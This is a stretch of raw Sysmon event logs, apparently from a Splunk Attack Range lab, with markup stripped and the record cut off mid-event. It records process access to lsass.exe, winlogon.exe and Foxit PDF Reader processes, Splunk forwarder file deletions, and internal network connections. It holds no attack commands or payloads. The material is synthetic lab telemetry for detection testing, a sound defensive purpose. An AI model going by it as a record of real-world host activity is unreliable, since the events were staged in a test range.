12:16:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015031Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.548{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 23542300x800000000000000015030Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.376{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0395EA6AF4C0D7699F4E1DF75744508,SHA256=3D52A8C3438EF16E63CBFD38E716B151D586AED30532DA6473EF6127880E5D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:42.051{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6485705928237E656082113FC8BF9B27,SHA256=CC64B214B89216A67578B139EA0CE9D0F1F0192363E6055F69EC5D4DB9BA3060,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015063Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:43.899{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31BD55CE03C32BC053E61BBE55408B68,SHA256=1497D8B18D95297DC620EC41B89199FF21C297DFF00C0BF509544F01C95E99CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015062Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.003{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50033-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000039503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.384{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.384{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.384{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.369{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.369{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.369{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.369{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000039496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:40.682{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56214-false10.0.1.12-8000- 10341000x800000000000000039495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:43.068{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED46E5C6EEB4D07CE9EEE3477FA64C6,SHA256=CD33B309DFBE00BA2B0AA2861FBFFC3B3CE1D6222D571257DACEDE1191110427,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015064Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:44.932{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BF70CCFE018A3FCBAEBFFEE8A2DF70,SHA256=6DBC50D1AFB025C17B7446CA6A73DF31B82B7A73B91E7D41B68D055F90D5840F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.957{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220ATTACKRANGE\AdministratorC:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exeC:\Users\ADMINI~1\AppData\Local\Temp\%%%11A4.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.615{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.606{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.606{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.488{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.488{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.488{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=657835BC7C6159BEF57CFF59F6BB4523,SHA256=A542CDCEB06EEA89A94F03C926815AE53F6DA8704215EB033E8C7BCB1124689E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.459{FE4C2B44-D9F5-63C7-1200-00000000AF02}7566572C:\Windows\System32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit 